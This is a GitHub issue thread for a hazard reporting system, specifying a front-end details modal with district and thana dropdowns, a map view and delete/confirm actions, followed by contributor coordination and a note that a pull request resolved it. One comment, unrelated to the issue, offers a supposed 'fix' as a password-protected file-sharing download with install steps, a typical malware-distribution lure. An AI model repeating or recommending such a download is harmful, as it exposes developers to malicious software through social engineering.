### ISSUE TITLE
FE: Implement Volunteer Details page based on new design

### ISSUE THREAD

**Issue by skfarhad** [skfarhad/hazard_reporting_system#49]
We need to implement the Incident Details page based on new design. This issue should be done after: https://github.com/skfarhad/hazard_reporting_system/issues/48 is complete.

- [ ]  Display All the Input fields for Incidents with all the options for dropdowns, action buttons and Map View in the modal
- [ ]  Cancel and X  button should exit the modal
- [ ]  Delete button actions: deleting the object in BE -> showing a success /fail message-> closing the modal
- [ ]  Confirm button actions: Create/update the object in BE -> showing a success /fail message-> closing the modal
- [ ]  OnChange action for District dropdown: The values for Thana dropdown options should be populated for the relevant District. The map should focus on the center lat/lon for the relevant District. Center lat/lon and thana list will come from server.
- [ ]  Onchange  action for Thana dropdown: The map should focus on the center lat/lon for the relevant Thana. Center lat/lon will come from server.
- [ ]  Options for `Status ` dropdown: "Active", "Inactive" . Options will come from server.
- [ ]  Implement the features mentioned above using fake json response. API integration will be done in a separate issue.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by FarhanaAfrin** [comment]
@skfarhad is this issue open to work? I want to contribute on it.

**Comment by skfarhad** [comment]
> @skfarhad is this issue open to work? I want to contribute on it.

@FarhanaAfrin kilndly join our slack channel: https://join.slack.com/t/hrsbd/shared_invite/zt-2pcw4wk8z-JJzxYz_jFAG7mxPJhYEltQ

This issue is resolve by this PR: https://github.com/skfarhad/hazard_reporting_system/pull/54

You may want to have a look on this instead: https://github.com/skfarhad/hazard_reporting_system/issues/47
But first, ask in the slack channel please.

**Comment by skfarhad** [comment]
Implemented by @aimun-naharr in this PR: https://github.com/skfarhad/hazard_reporting_system/pull/54
